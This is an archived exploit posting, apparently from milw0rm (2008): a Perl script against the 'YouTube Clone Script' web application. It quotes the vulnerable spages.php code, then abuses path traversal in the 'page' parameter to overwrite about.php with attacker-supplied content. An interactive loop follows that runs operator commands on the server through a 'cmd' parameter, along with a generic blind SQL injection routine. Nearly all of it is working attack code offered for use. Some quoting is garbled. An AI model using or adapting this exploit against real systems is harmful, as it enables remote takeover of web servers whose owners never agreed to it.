YouTube Clone Script (spages.php) Remote Code Execution Exploit#!/usr/bin/perl #inphex #/siteadmin/spages.php # include(`../include/config.php`); # include(`../include/function.php`); # # if($_REQUEST['update']) # { # $file_path = $config['BASE_DIR'].`/templates/`.$_REQUEST['page']; # if(file_exists($file_path)) # { # $handle = fopen($config['BASE_DIR'].`/templates/`.$_REQUEST['page'], `w`); # fwrite($handle,stripslashes($_POST['body'])); # fclose($handle); # $msg = `Page updated successfully`; # } # else # $err = `Page does not exist`; # } # # STemplate::assign('msg',$msg); # STemplate::assign('err',$err); # STemplate::display(`siteadmin/spages.tpl`); # #Very easy one... #YouTube-Clone-Script is quite buggy,there are more bugs. use Digest::MD5 qw(md5 md5_hex md5_base64); use LWP::UserAgent; use HTTP::Cookies; use Switch; $host_ = shift; $path_ = shift; print `usage: $0 http://host /path/\n`; $info{'info'} = { `author` => [`inphex`], `name` => [`YouTube Clone Script Remote Code Execution`], `version` => [], `description` => [`This Script will exploit a Remote Code Execution vulnerability existing in the YouTube Clone Script\n`], `options` => { `agent` => ``, `proxy` => ``, `default_headers` => [ [`key`,`value`]], `timeout` => 2, `cookie` => { `cookie` => [`key=value`], }, }, `sending_options` => { `host` => $host_, `path` => $path_.`siteadmin/spages.php`, `port` => 80, `method_a` => `REMOTE_CHECK`, `attack` => { `update` => [`get`,`update`,`1`], `path` => [`get`,`page`,`../about.php`], `content` => [`post`,`body`,``], }, }, }; &start($info{'info'},222); do { print `\$`;$cmd = ;chomp($cmd); $info{'info'} = { `options` =>{`agent` => ``, `proxy` => ``, `default_headers` => [ [`key`,`value`]], `timeout` => 2, `cookie` => {`cookie` => [`key=value`],},},`sending_options` =>{`host` => $host_, `path` => $path_.`about.php`, `port` => 80, `method_a` => `CODE_EXECUTION`, `attack` =>{`cmd` => [`get`,`cmd`,$cmd], },},}; &start($info{'info'},221); $content = ${$info{'info'}}{221}{'content'}; print $content; print `\n`; } while (1); sub start { $a_ = shift; @EXPORT = qw( start $return $a_ ); $id = shift; $get_dA = get_d_p_s(`get`); $post_dA = get_d_p_s(`post`); my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); my $jj = 1; my $ii = 48; my $hh = 1; my $ppp = 0; my $s = shift; my $a = ``; my $res_p = ``; my $h = ``; ($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'}); $ua = LWP::UserAgent->new; $ua->timeout($a_->{'options'}{'timeout'}); if ($a_->{'options'}{'proxy'}) { $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); } $agent = $a_->{'options'}{'agent'} || `Mozilla/5.0`; $ua->agent($agent); { while (($k,$v) = each(%{$a_})) { if ($k ne `options` && $k ne `sending_options`) { foreach $r (@{$a_->{$k}}) { if ($a_->{$k}[0]) { print $k.`:`.$a_->{$k}[0].`\n`; } } } } foreach $j (@{$a_->{'options'}{'default_headers'}}) { $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); $m++; } if ($a_->{'options'}{'cookie'}{'cookie'}[0]) { $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); } } switch ($method_m) { case `attack` { &attack();} case `SQL_INJECTION_BLIND` { &sql_injection_blind();} case `REMOTE_COMMAND_EXECUTION` { &attack();} case `REMOTE_CODE_EXECUTION` {&attack();} case `REMOTE_FILE_INCLUSION` { &attack();} case `LOCAL_FILE_INCLUSION` { &attack(); } else { &attack(); } } sub attack { if ($post_dA eq ``) { $method = `get`; } elsif ($post_dA ne ``) { $method = `post`; } if ($method eq `get`) { $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop.`?`.$get_dA); ${$a_}{$id}{'content'} = $res_p; foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) { if (${$jj} ne ``) { ${$a_}{$id}{'regex'}[$h] = ${$jj}; } $jj++; } $h++; } } elsif ($method eq `post`) { $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop.`?`.$get_dA,`application/x-www-form-urlencoded`,$post_dA); ${$a_}{$id}{'content'} = $res_p; foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) { if (${$jj} ne ``) { ${$a_}{$id}{'regex'}[$h] = ${$jj}; } $jj++; } $h++; } } } sub sql_injection_blind { while () { while ($ii <= 90) { if(check($ii,$hh) == 1) { syswrite STDOUT,lc(chr($ii)); $hh++; $chr = $chr.chr($ii); } $ii++; } push(@ffs,length($chr)); if (($#ffs -1) == $ffs) { print `\nFinished/Error\n`; exit; } $ii = 48; } } sub check($$) { $ii = shift; $hh = shift; if (get_d_p_s(`post`) ne ``) { $method = `post`; } else { $method = `get`;} if ($method eq `get`) { $ppp++; $query = modify($get_dA,$ii,$hh); print $ii.`-`.$hh.`\n`; $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}.`?`.$query); foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) { return 1; } else { return 0; } $h++; } } elsif ($method eq `post`) { $ppp++; $query_g = modify($get_dA,$ii,$hh); $query_p = modify($post_dA,$ii,$hh); $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}.`?`.$query_g,`application/x-www-form-urlencoded`,$query_p); foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) { return 1; } else { return 0; } $h++; } } } sub modify($$$) { $string = shift; $replace_by = shift; $replace_by1 = shift; if ($string !~/\$i/ && $string !~/\$h/) { print $string; } elsif ($string !~/\$i/) { $ff = substr($string,0,index($string,`\$h`)); $ee = substr($string,rindex($string,`\$h`)+2); $string = $ff.$replace_by1.$ee; return $string; } elsif ($string !~/\$h/) { $f = substr($string,0,index($string,`\$i`)); $e = substr($string,rindex($string,`\$i`)+2); $string = $f.$replace_by.$e; return $string; } else { $f = substr($string,0,index($string,`\$i`)); $e = substr($string,rindex($string,`\$i`)+2); $string = $f.$replace_by.$e; $ff = substr($string,0,index($string,`\$h`)); $ee = substr($string,rindex($string,`\$h`)+2); $string = $ff.$replace_by1.$ee; return $string; } } sub get_d_p_s { $g_d_p_s = shift; $post_data = ``; $get_data = ``; $header_data = ``; %header_dA = (); while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) { if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ `get`) { $method = `get`; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1].`=`.$a_->{'sending_options'}{'attack'}{$k}[2]); } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ `post`) { $method = `post`; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1].`=`.$a_->{'sending_options'}{'attack'}{$k}[2]); } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ `header`) { $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; } $hp++; } $yy = $#get; while ($bb <= $#get) { $get_data .= $get[$yy].`&`; $bb++; $yy--; } $l = $#post; while ($k <= $#post) { $post_data .= $post[$l].`&`; $k++; $l--; } if ($g_d_p_s eq `get`) { return $get_data; } elsif ($g_d_p_s eq `post`) { return $post_data; } elsif ($g_d_p_s eq `header`) { return %header_dA; } } sub get_data { $h_host_h_xdsjaop = shift; $h_path_h_xdsjaop = shift; %hash = get_d_p_s(`header`); while (($u,$c) = each(%hash)) { $ua->default_headers->push_header($u => $c); } $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop); return $req->content; } sub post_data { $h_host_h_xdsjaop = shift; $h_path_h_xdsjaop = shift; $content_type = shift; $send = shift; %hash = get_d_p_s(`header`); while (($u,$c) = each(%hash)) { $ua->default_headers->push_header($u => $c); } $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop); $req->content_type($content_type); $req->content($send); $res = $ua->request($req); return $res->content; } } # milw0rm.com [2008-04-23]